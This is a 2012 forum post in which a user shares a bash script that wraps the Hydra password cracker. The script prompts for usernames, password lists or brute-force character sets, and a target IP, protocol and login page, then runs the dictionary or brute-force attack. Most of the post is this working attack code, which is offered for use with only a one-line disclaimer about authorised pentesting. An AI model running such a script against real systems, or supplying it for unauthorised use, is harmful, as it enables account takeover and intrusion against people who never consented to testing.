Hydra bruteforce and dictionary attack script

It is a script to make password attacks a lot easier for people. It can do either bruteforcing or dictionary attacks.

I spent all morning learning how to code this and I wanted to share it with everyone. I couldn't find a section in the forums for scripts, but I noticed there were a lot of scripts in this section, so I chose to post here (please move if it is the wrong section).

version 0.1

  • It can do a dictionary attack
  • It can bruteforce
  • It can use a single username or a list of usernames
  • You can choose how many tasks to run simultaneously
  • You can choose the timeout time
  • You can choose the webpage to attack

version 0.2

  • Fixed a problem in the if statement that executed the final command to run hydra. It was stopping the script working if you had picked password option 1 or 2.
  • New issue: when choosing the option to use text files, the script turns the ‘ into /, so it messes up the script. Looking for a fix, does anyone know one?

Things I want to do

  • Add in error detection in case user enters wrong info
  • More options to define the attack

COPY PASTE SCRIPT INTO NOTEPAD AND SAVE AS ATTACK.SH

Code:
#!/bin/bash
# PLEASE READ AND STUDY BEFORE LAUNCHING

# --------------------------------------------------------------------------------------------------------------------#
# v0.2 17.06.2012
#
# Copyright (C) 2012  Deviney

# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public 
# License as published by the Free Software Foundation; either version 2 of the License, or any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied 
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
# --------------------------------------------------------------------------------------------------------------------#

# Disclaimer:   This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
#               I sincerely hope skiddies find it overwhelming. (not very likely tho)


#  ===========================================================================================  #
# 				  "...On The Shoulders Of Giants..."                                            #
#  ===========================================================================================  #

# 		Large chunks copied directly from VulpiArgenti's PwnSTAR script                            #
#										                                                        #
#		I only used parts that made the script look user friendly; the code
#		that does the work is my own or has been edited to do a different job.

#  ===========================================================================================  #

# Thanks to VulpiArgenti; I used his code as a learning base



# ~~~~~~~~~~  Environment Setup ~~~~~~~~~~ #
# Text color variables - saves retyping these awful ANSI codes

txtrst="\e[0m"      # Text reset

def="\e[1;34m"	    # default 		   blue
warn="\e[1;31m"     # warning		   red
info="\e[1;34m" 	# info             blue
q="\e[1;32m"		# questions        green
inp="\e[1;36m"	    # input variables  cyan

### 7 characters = 120 pixels?
var=$(ls /etc | grep kde4)          # detect KDE
if [[ -z $var ]];then
    resize -s 38 85 &> /dev/null    # resize the terminal if gnome, not KDE
fi

echo -e "\e[0;40m"      # background black
clear

# ~~~~~~~~~~ Intro ~~~~~~~~~~ #

banner_fn()
{
	echo -e "\e[1;37m 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Deviney~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                              
                  
                                                                                                                  
    *                    **                                  *******      *                    *           
  **          *           **                               *       ***  **                   **            
  **         ***          **                              *         **  **                   **            
  **          *           **                              **        *   **                   **            
  **                      **   ***  ****                   ***          **           ****    **            
  **  ***   ***       *** **    **** **** *    ****       ** ***        **  ***     * ***  * **  ***       
  ** * ***   ***     *********   **   ****    * ***  *     *** ***      ** * ***   *   ****  ** * ***      
  ***   ***   **    **   ****    **          *   ****        *** ***    ***   *** **    **   ***   *       
  **     **   **    **    **     **         **    **           *** ***  **     ** **    **   **   *        
  **     **   **    **    **     **         **    **             ** *** **     ** **    **   **  *         
  **     **   **    **    **     **         **    **              ** ** **     ** **    **   ** **         
  **     **   **    **    **     **         **    **               * *  **     ** **    **   ******        
  **     **   **    **    **     ***        **    **     ***        *   **     **  ******    **  ***       
  **     **   *** *  *****        ***        ***** **   *  *********    **     **   ****     **   *** *    
   **    **    ***    ***                     ***   ** *     *****       **    **             **   ***     
       *                                             *                       *                           
      *                                               **                    *                            
     *                                                                     *                             
    *                                                                     *                             
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Hydro_Password_Hack_Script_V_0.2~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

"
}

username_options_fn()
{	
sleep 2
	# Trap Ctrl-C
	trap exit_fn INT 
	
    username_options=
    echo -e "$info Press ctrl-C at any time to exit neatly\n"
    sleep 1
	echo -e "$q Are we using a single username or a username list? (list has to be a text file)"
    sleep 0.5
    echo -e "$def
	
    1) A single username

	
    2) A username list (text file)

    
    q) Exit from the script
	
	"

read username_options
	if [[ $username_options = q ]];then
		exit_fn
    elif [[ $username_options = 1 ]];then
        sin_user_fn
    else
	list_user_fn
    fi
    
}

sin_user_fn()
{
clear
banner_fn
usernamesign=
: ${usernamesign:="-l "}
echo -e "$q What is the username we will be using?"
read username
password_options_fn
}

list_user_fn()
{
clear
banner_fn
usernamesign= 
: ${usernamesign:="-L "}
echo -e "$q What is the path to your username list? (E.g. root/UsernameList.txt)"
read username
password_options_fn
}

password_options_fn()
{
clear
banner_fn
    password_options=
	echo -e "$q Are we using a single password or a password list? (list has to be a text file)"
    sleep 0.5
    echo -e "$def
	
    1) A single password

	
    2) A password list (text file)


    3) A Bruteforce attack
    
    q) Exit from the script
	
	"
    read password_options
    if [[ $password_options = q ]];then
		exit_fn
    elif [[ $password_options = 1 ]];then
        sin_password_fn
    elif [[ $password_options = 2 ]];then
	list_password_fn
    else
	bruteforce_password_fn
    fi
    
}

sin_password_fn()
{
clear
banner_fn
passwordsign= 
: ${passwordsign:="-p "}
echo -e "$q What is the password we will be using?"
read password
Task_fn
}

list_password_fn()
{
clear
banner_fn
passwordsign= 
: ${passwordsign:="-P "}
echo -e "$q What is the path to your password list? (E.g. root/PasswordList.txt)"
read password
Task_fn
}

bruteforce_password_fn()
{
clear
banner_fn
brute_min=
brute_max=
brute_char= 
: ${passwordsign:="-x"}
: ${passwordsignbreak:=":"}
echo -e "$q What is the min amount of characters in the password?"
read brute_min
echo -e "$q What is the max amount of characters in the password?"
read brute_max
echo -e "$q What characters will be bruteforced? (do not use any spaces, e.g. 'abcdefghi.@123')"
read brute_char
Task_fn
}

Task_fn()
{
clear
banner_fn
task=
echo -e "$q How many parallel connections would you like? (suggest 1-32)"
read task
timeout_fn
}

timeout_fn()
{
clear
banner_fn
timeout=
echo -e "$q How long would you like a connection to wait before being classed as timed out? (suggest 5-30)"
read timeout
ip_address_fn
}

ip_address_fn()
{
clear
banner_fn
ip=
echo -e "$q What is the ip of the target?"
read ip
protcol_fn
}

protcol_fn()
{
clear
banner_fn
protcol=
echo -e " $q What protocol will you be using? (Enter 'show' to see the protocols available)"
read protcol
if [[ $protcol = show ]];then
show_protcols_fn
else
webpage_fn
fi
}

show_protcols_fn()
{
clear
banner_fn
echo -e "AFP,			Cisco AAA,		 Cisco auth,	 	Cisco enable"
echo -e "CVS,	 		Firebird,		 FTP, 			HTTP-FORM-GET"
echo -e "HTTP-FORM-POST, 	HTTP-GET,		 HTTP-HEAD, 		HTTP-PROXY"
echo -e "HTTPS-FORM-GET,	HTTPS-FORM-POST,	 HTTPS-GET, 		HTTPS-HEAD"
echo -e "HTTP-Proxy, 		ICQ,     		 IMAP, 			IRC"
echo -e "LDAP, 			MS-SQL,			 MYSQL, 		NCP"
echo -e "NNTP, 			Oracle Listener,	 Oracle, 		Oracle SID"
echo -e "PC-Anywhere, 		PCNFS,			 POP3, 			POSTGRES"
echo -e "RDP, 			Rexec, 			 Rlogin, 		Rsh"
echo -e "SAP/R3, 		SIP, 			 SMB, 			SMTP"
echo -e "SMTP Enum, 		SNMP,			 SOCKS5, 		SSH (v1 and v2)"
echo -e "Subversion, 		Teamspeak (TS2),	 Telnet, 		VMware-Auth"
echo -e "VNC,			XMPP"
echo -e ""
echo -e "Press enter to return to the previous question"
read
protcol_fn
}

webpage_fn()
{
clear
banner_fn
webpage=
echo -e "$q What is the webpage of the target login screen? (if there is no page after the IP address just enter a forward slash '/')"
read webpage
execute_fn
}

execute_fn()
{
clear
banner_fn
 if [[ $password_options = [1-2] ]];then
	echo -e "$warn hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
	hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage
    elif [[ $password_options = 3 ]];then
        echo -e "$warn hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
	hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage
fi
}

exit_fn()
{
clear
exit 0
}

# ~~~~~~~~~~ Main Script 2 lines!!! ~~~~~~~~~~ #

banner_fn
username_options_fn